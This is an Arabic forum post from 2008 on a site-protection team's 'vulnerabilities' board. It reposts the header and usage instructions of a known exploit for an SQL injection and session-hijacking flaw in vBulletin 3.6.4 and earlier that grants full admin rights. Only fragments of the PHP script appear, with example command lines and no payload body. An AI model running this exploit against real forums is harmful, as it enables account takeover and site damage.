العودة   مجموعة رابط من اجل العراق - التدريب والتطوير > ::: فريق T-72 لدعم وحماية المواقع ::: > [ الثغرات ]
التسجيل التعليمـــات قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل كافة المشاركات مقروءة
[ الثغرات ]

::: ملتقى لا يقبل الاضافات ::: تحت مسؤولية فريق الدعم في الشركة ::: احدث الثغرات المكتشفه :::

 
 
أدوات الموضوع طرق مشاهدة الموضوع
قديم 03-06-2008, 05:59 PM   رقم المشاركة : 1
T-72
فريق T-72 لدعم وحماية المواقع
 
الصورة الرمزية T-72






T-72 غير متواجد حالياً

T-72 is on a distinguished road


افتراضي ثغرة بالمنتديات لجلب معلومات حساسه من قاعدة البيانات

ثغرة بالمنتديات لجلب معلومات حساسه من قاعدة البيانات

السلام عليكم ورحمة الله وبركاته

تحياتي للجميع ...

الثغرة :

كود PHP:
-----------------------------------------------------------------------------
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection privilege
escalation by session hijacking exploit
by rgod
mail
retrog at alice dot it
site
: ---

Works regardless of php.ini settingsyou need a Super Moderator account
to copy posts among threads
to be launched while admin is logged in to
the control panel
this will give you full admin privileges
note
this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
');

if ($argc<7) {
print_r('
-----------------------------------------------------------------------------
Usagephp '.$argv[0].' host path user pass forumid postid OPTIONS
host
target server (ip/hostname)
pathpath to vbulletin
user
/passyou need a moderator account
forumid
existing forum
postid
existing post
Options
:
-
p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example
:
php '.$argv[0].' localhost /vbulletinrgod mypass 2 121 -P1.1.1.1:80
php 
'.$argv[0].' localhost /vbulletinrgod mypass 1 143 -p81
-----------------------------------------------------------------------------
'); 
الثغره نزلت بمواقع السيكورتي






التوقيع :
اعوذ بالله من الشيطان الرجيم

بسم الله الرحمن الرحيم *** وما الله بغافل عما تعملون *** صدق الله العظيم

رئيس فريق T-72 لدعم وحماية المواقع

آخر تعديل T-72 يوم 03-06-2008 في 06:05 PM.
 

« الموضوع السابق | الموضوع التالي »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع إلى


الساعة الآن: 03:20 PM

 
Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.
جميع الحقوق محفوظه

تصميم معهد ترايدنت